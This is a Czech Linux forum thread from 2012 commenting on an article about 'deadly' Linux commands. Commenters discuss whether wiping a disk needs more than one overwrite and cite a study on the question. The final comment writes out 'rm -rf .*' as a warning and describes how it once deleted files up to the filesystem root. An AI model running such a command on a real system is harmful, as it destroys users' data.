    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    No jo, příště bych mohl na live CD, které tam vrazím, zkontrolovat přítomnost těchto programů a vyzkoušet je (pokud ovšem do té doby nezapomenu, jakže se to jmenují ;-) ) Dnes jsem asi 5 minut lovil v mozkových závitech, jak se jmenuje program watch :-) Co nepoužívám obden, to se mi rádo z hlavy vykouří...
    Kdo vám tvrdí, že jste paranoidní, ten v tom spiknutí s největší pravděpodobností jede taky.
    Jiří Svoboda avatar 27.9.2012 08:26 Jiří Svoboda | skóre: 37 | blog: cat /dev/mind | Prostějov
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Jeden přepis nulami bohatě stačí. A je to rychlé. Už se to (nejen) tu řešilo...
    27.9.2012 08:52 Honza Jaroš | skóre: 6 | blog: moje_strana_plotu | Bohnice
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    27.9.2012 09:05 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů

    Jakkoli souhlasím s tím, že opakované přepisování je v běžných podmínkách nesmysl, věta

    V roce 2008 proto vznikla studie, která si vzala za cíl prokázat zbytečnost vícenásobných přepisů u moderních disků.

    nevzbuzuje moc důvěru.

    27.9.2012 10:30 kavol | skóre: 28
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Kolik je 1 + 1?

    technik: 2

    matematik: řešení existuje

    právník: A kolik chcete aby to vyšlo?

    jste si ještě nezvykl, že matematici na takové blbosti nemají čas, skutečných techniků ubývá, a třetí kategorie se nám montuje všude?

    nějaká realita není důležitá, proč by se pozorování a teorie uváděly v soulad se skutečností, když můžeme napřed prohlásit, co bude platit, a pak podle toho nastavit podmínky pokusu tak, aby to vyšlo?
    Jiří Svoboda avatar 27.9.2012 15:26 Jiří Svoboda | skóre: 37 | blog: cat /dev/mind | Prostějov
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    No já bych řekl, že je to jen nešťastná vsuvka autora českého článku.

    Můj původní příspěvek je zde:

    http://www.abclinuxu.cz/clanky/jaderne-noviny-13.-10.-2011-bezpecne-mazani-na-ext4#68

    Je tam k dispozici ke stažení i ta studie.
    27.9.2012 05:17 Jan Molič
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Ještě tam chybí "smazání skrytých souborů v domovském adresáři", tedy
    rm -rf .*
    což se mi jednou povedlo udělat. Neuvědomil jsem si, že .* expanduje na .. , čímž to vyleze o úroveň výš a mazání pokračuje až ke kořeni. Možná už je v rm výjimka. Parametry -rf jsem tehdy použil z lenosti, netucha co to může provést :-)

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.